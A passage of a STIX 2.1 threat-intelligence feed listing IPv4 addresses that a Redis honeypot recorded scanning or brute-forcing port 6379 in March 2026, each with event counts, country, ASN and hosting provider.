      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T08:25:13.000Z",
      "valid_until": "2026-04-04T08:25:12.000Z"
    },
    {
      "created": "2026-03-03T09:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4847; asn_org=China Networks Inter-Exchange; redis_cmd_hits=0",
      "id": "indicator--729a819c-9b83-44ac-95f9-d8ee6b66e6f1",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T09:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '1.203.97.227']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T09:25:13.000Z",
      "valid_until": "2026-04-04T09:25:12.000Z"
    },
    {
      "created": "2026-03-03T09:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=134238; asn_org=CHINANET Jiangx province IDC network; redis_cmd_hits=0",
      "id": "indicator--ca87acee-bbfa-4deb-bfe8-e8ace6cf58b6",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T09:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '106.225.133.217']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T09:25:13.000Z",
      "valid_until": "2026-04-04T09:25:12.000Z"
    },
    {
      "created": "2026-03-03T09:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=AM; asn=197834; asn_org=Ucom CJSC; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.0; redis_cmd_hits=0",
      "id": "indicator--615cba90-b5cc-4837-bb8c-2feb9627d252",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T09:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '176.32.195.85']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T09:25:13.000Z",
      "valid_until": "2026-04-04T09:25:12.000Z"
    },
    {
      "created": "2026-03-03T09:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4812; asn_org=China Telecom Group; redis_cmd_hits=0",
      "id": "indicator--30cb16a0-217b-4c34-9aae-7f5c489570e9",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T09:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '218.78.131.154']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T09:25:13.000Z",
      "valid_until": "2026-04-04T09:25:12.000Z"
    },
    {
      "created": "2026-03-03T09:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--8face18b-074f-4c6c-9320-e0586389cfec",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T09:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '54.186.123.97']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T09:25:13.000Z",
      "valid_until": "2026-04-04T09:25:12.000Z"
    },
    {
      "created": "2026-03-03T09:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--d21a10a0-c9e3-478d-9f96-1a35fe9552ac",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T09:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.23.182.67']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T09:25:13.000Z",
      "valid_until": "2026-04-04T09:25:12.000Z"
    },
    {
      "created": "2026-03-03T09:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0",
      "id": "indicator--77fec30b-04fb-4400-87c5-dc9f9e8a906a",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T09:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '71.6.233.159']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T09:25:13.000Z",
      "valid_until": "2026-04-04T09:25:12.000Z"
    },
    {
      "created": "2026-03-03T09:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=19318; asn_org=Interserver, Inc; redis_cmd_hits=0",
      "id": "indicator--ea3d5a36-ba3b-431d-9037-6fe5e87d2d94",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T09:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '74.50.81.220']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T09:25:13.000Z",
      "valid_until": "2026-04-04T09:25:12.000Z"
    },
    {
      "created": "2026-03-03T10:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=36352; asn_org=HostPapa; redis_cmd_hits=0",
      "id": "indicator--13e2a003-4826-4539-af64-5aa1dd214f18",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T10:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '23.94.94.191']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T10:25:13.000Z",
      "valid_until": "2026-04-04T10:25:12.000Z"
    },
    {
      "created": "2026-03-03T10:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=28; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--b7fa5d27-9bb2-443b-8a85-1777b2dd8e9e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T10:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.1.80']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T10:25:13.000Z",
      "valid_until": "2026-04-04T10:25:12.000Z"
    },
    {
      "created": "2026-03-03T10:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--a7a04ed8-9187-4fb9-a5ac-f77e27d4bff3",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T10:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.1.84']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T10:25:13.000Z",
      "valid_until": "2026-04-04T10:25:12.000Z"
    },
    {
      "created": "2026-03-03T13:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--ae186e39-9c43-4e07-8576-2c79afea315c",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T13:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.79.109.236']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T13:25:14.000Z",
      "valid_until": "2026-04-04T13:25:12.000Z"
    },
    {
      "created": "2026-03-03T14:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4811; asn_org=China Telecom Group; redis_cmd_hits=0",
      "id": "indicator--8ffea8cd-b594-4410-9708-2fa5dcdc61c6",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T14:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '14.103.220.97']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T14:25:07.000Z",
      "valid_until": "2026-04-04T14:25:06.000Z"
    },
    {
      "created": "2026-03-03T15:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=KR; asn=38700; asn_org=SMILESERV; redis_cmd_hits=0",
      "id": "indicator--45e3ff64-19c4-4d1a-a474-8097cbabf8fa",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T15:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '115.68.229.247']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T15:25:13.000Z",
      "valid_until": "2026-04-04T15:25:12.000Z"
    },
    {
      "created": "2026-03-03T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=137718; asn_org=Beijing Volcano Engine Technology Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--923e630e-83ac-408c-a78e-0ab8969af41a",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '115.190.97.5']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T16:25:13.000Z",
      "valid_until": "2026-04-04T16:25:12.000Z"
    },
    {
      "created": "2026-03-03T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--d7e4ed83-6b2f-48d3-a294-0e5c7f644613",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '182.92.181.218']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T16:25:13.000Z",
      "valid_until": "2026-04-04T16:25:12.000Z"
    },
    {
      "created": "2026-03-03T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--c7d75049-12e5-439b-b406-0934f2125144",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.40.250.19']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T16:25:13.000Z",
      "valid_until": "2026-04-04T16:25:12.000Z"
    },
    {
      "created": "2026-03-03T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0",
      "id": "indicator--7015d63d-2ed8-4d24-aea9-72d305aa44d2",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '218.2.210.142']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T16:25:13.000Z",
      "valid_until": "2026-04-04T16:25:12.000Z"
    },
    {
      "created": "2026-03-03T17:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--e97b1d7e-417f-45a5-9e0c-30137ffe8288",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T17:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '100.29.192.93']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T17:25:13.000Z",
      "valid_until": "2026-04-04T17:25:12.000Z"
    },
    {
      "created": "2026-03-03T17:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--17278fc2-3848-44a7-b272-635353b80321",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T17:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '104.236.54.82']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T17:25:13.000Z",
      "valid_until": "2026-04-04T17:25:12.000Z"
    },
    {
      "created": "2026-03-03T17:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--2072fd31-a642-41a9-a3cc-2e7d1a32fd3d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T17:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '18.97.26.56']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T17:25:13.000Z",
      "valid_until": "2026-04-04T17:25:12.000Z"
    },
    {
      "created": "2026-03-03T17:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0",
      "id": "indicator--8e65190c-eae2-45f1-a97e-b1f8b34160e5",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T17:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '49.115.217.27']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T17:25:13.000Z",
      "valid_until": "2026-04-04T17:25:12.000Z"
    },
    {
      "created": "2026-03-03T18:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0",
      "id": "indicator--34d2f6fc-0f4f-491d-ad26-aaa74c3eedfa",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T18:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.242.226.5']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T18:25:13.000Z",
      "valid_until": "2026-04-04T18:25:12.000Z"
    },
    {
      "created": "2026-03-03T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0",
      "id": "indicator--ffafaa18-14bd-4c40-a135-08974301211b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.242.226.92']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T19:25:13.000Z",
      "valid_until": "2026-04-04T19:25:12.000Z"
    },
    {
      "created": "2026-03-03T21:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=BR; asn=28209; asn_org=Under Servicos de Internet Ltda; redis_cmd_hits=0",
      "id": "indicator--333a1926-ef3c-48b9-a5da-08d3a999f1dc",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T21:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '179.127.11.206']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T21:25:14.000Z",
      "valid_until": "2026-04-04T21:25:12.000Z"
    },
    {
      "created": "2026-03-03T21:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0",
      "id": "indicator--117950da-2848-4f32-885c-5730176e9b0c",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T21:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '183.6.4.31']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T21:25:14.000Z",
      "valid_until": "2026-04-04T21:25:12.000Z"
    },
    {
      "created": "2026-03-03T21:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--30d1c40c-a3be-42ce-808b-f7fd506db4bf",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T21:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '205.210.31.244']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T21:25:14.000Z",
      "valid_until": "2026-04-04T21:25:12.000Z"
    },
    {
      "created": "2026-03-03T21:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--1a3c6d6e-c3a5-458a-9e2e-9d9faa8f9e50",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T21:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '206.168.34.44']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T21:25:14.000Z",
      "valid_until": "2026-04-04T21:25:12.000Z"
    },
    {
      "created": "2026-03-03T22:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=3; ports=6379; cc=US; asn=20473; asn_org=The Constant Company, LLC; redis_cmd_hits=0",
      "id": "indicator--bd6eaedd-af93-4a40-a777-3a8d266e1b54",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T22:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '149.28.56.56']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T22:25:09.000Z",
      "valid_until": "2026-04-04T22:25:08.000Z"
    },
    {
      "created": "2026-03-03T22:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=8560; asn_org=IONOS SE; redis_cmd_hits=0",
      "id": "indicator--18c12c1d-4be3-4c3e-8f7c-15bbe5a1df40",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T22:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '212.132.86.38']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T22:25:09.000Z",
      "valid_until": "2026-04-04T22:25:08.000Z"
    },
    {
      "created": "2026-03-03T23:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--a85f56bc-9f62-4a98-8bbf-354ee47fd287",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T23:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '135.237.125.196']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T23:25:14.000Z",
      "valid_until": "2026-04-04T23:25:12.000Z"
    },
    {
      "created": "2026-03-03T23:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=20473; asn_org=The Constant Company, LLC; redis_cmd_hits=0",
      "id": "indicator--dddf4205-b141-49e0-9906-17015631f8e2",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T23:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '149.28.239.163']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T23:25:14.000Z",
      "valid_until": "2026-04-04T23:25:12.000Z"
    },
    {
      "created": "2026-03-04T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--aa9f3e46-0fad-4700-8f09-1fa26286f70b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '162.243.172.84']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T00:25:13.000Z",
      "valid_until": "2026-04-05T00:25:12.000Z"
    },
    {
      "created": "2026-03-04T01:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=201002; asn_org=PebbleHost Ltd; redis_cmd_hits=0",
      "id": "indicator--81babd64-255e-4b08-b279-d89a3fa1c1df",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-04T01:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '85.11.183.35']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T01:25:13.000Z",
      "valid_until": "2026-04-05T01:25:12.000Z"
    },
    {
      "created": "2026-03-04T03:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--36fe0be9-5332-4c6c-af98-71fbd66a8816",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T03:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '8.140.150.7']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T03:25:12.000Z",
      "valid_until": "2026-04-05T03:25:11.000Z"
    },
    {
      "created": "2026-03-04T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--61db714a-fe1c-47ce-8ccc-8f439477f1c7",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-04T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '100.49.117.77']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T04:25:13.000Z",
      "valid_until": "2026-04-05T04:25:13.000Z"
    },
    {
      "created": "2026-03-04T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=MA; asn=6713; asn_org=Itissalat Al-MAGHRIB; redis_cmd_hits=0",
      "id": "indicator--cd0035a7-cc3a-4e64-bfe7-94ffb3c8faa1",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-04T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '196.70.254.249']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T04:25:13.000Z",
      "valid_until": "2026-04-05T04:25:13.000Z"
    },
    {
      "created": "2026-03-04T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0",
      "id": "indicator--22bedab2-8535-413a-b657-36d9185483b5",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-04T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '222.223.160.18']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T04:25:13.000Z",
      "valid_until": "2026-04-05T04:25:13.000Z"
    },
    {
      "created": "2026-03-04T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0",
      "id": "indicator--389cd20d-d09a-44ed-8676-5e508096628e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-04T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '161.97.166.219']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T06:25:13.000Z",
      "valid_until": "2026-04-05T06:25:11.000Z"
    },
    {
      "created": "2026-03-04T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=TH; asn=56309; asn_org=Siamdata Communication Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--6b50ac41-bf35-4079-aeff-a67068a107bf",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T06:25:13.000Z",
